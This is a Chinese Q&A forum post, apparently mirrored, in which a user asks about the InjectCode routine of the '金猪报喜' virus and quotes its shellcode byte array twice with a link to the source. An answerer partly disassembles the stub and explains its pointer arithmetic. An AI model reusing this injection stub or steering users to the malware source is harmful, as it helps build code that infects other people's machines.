UC知道金猪报喜中的InjectCode函数
来源:百度知道 编辑:UC知道 时间:2024/07/02 08:23:28
我下载了一份金猪报喜病毒的源码,有几处不懂,想向各位大虾请教:
unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b"
"\x81\xeb\x0d\x10\x40\x00\x6a\x00"
"\x8d\x83\x30\x10\x40\x00\x50\x50"
"\x6a\x00\xb8\x78\x56\x34\x12\xff"
"\xd0\x9d\x61\xff\x25\x3a\x10\x40"
"\x00\x90\xBD\xF0\xD6\xED\xB0\xDD"
"\xC4\xEA\x00";
这段机器码是什么意思?
dwCallDataAddr = (DWORD *)(&pSearch+1) ;
dwCallNextAddr=(DWORD *)(&pSearch+5) ;
是什么意思?
http://bbs.hack58.com/read.php?tid-101018.html有源码
unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b"
"\x81\xeb\x0d\x10\x40\x00\x6a\x00"
"\x8d\x83\x30\x10\x40\x00\x50\x50"
"\x6a\x00\xb8\x78\x56\x34\x12\xff"
"\xd0\x9d\x61\xff\x25\x3a\x10\x40"
"\x00\x90\xBD\xF0\xD6\xED\xB0\xDD"
"\xC4\xEA\x00";
这段机器码是什么意思?
dwCallDataAddr = (DWORD *)(&pSearch+1) ;
dwCallNextAddr=(DWORD *)(&pSearch+5) ;
是什么意思?
http://bbs.hack58.com/read.php?tid-101018.html有源码
60 -> pushad
9c -> pushfd
E8 00000000 -> call 下一条 重定位的作用
5B -> pop ebx
81EB0D104000 ->sub ebx,0x40100D
...等等.. 自己用在vc编译器里面看汇编就知道了
dwCallDataAddr 取数据地址
dwCallNextAddr 下一个地址 = 数据地址+5
是金猪报喜病毒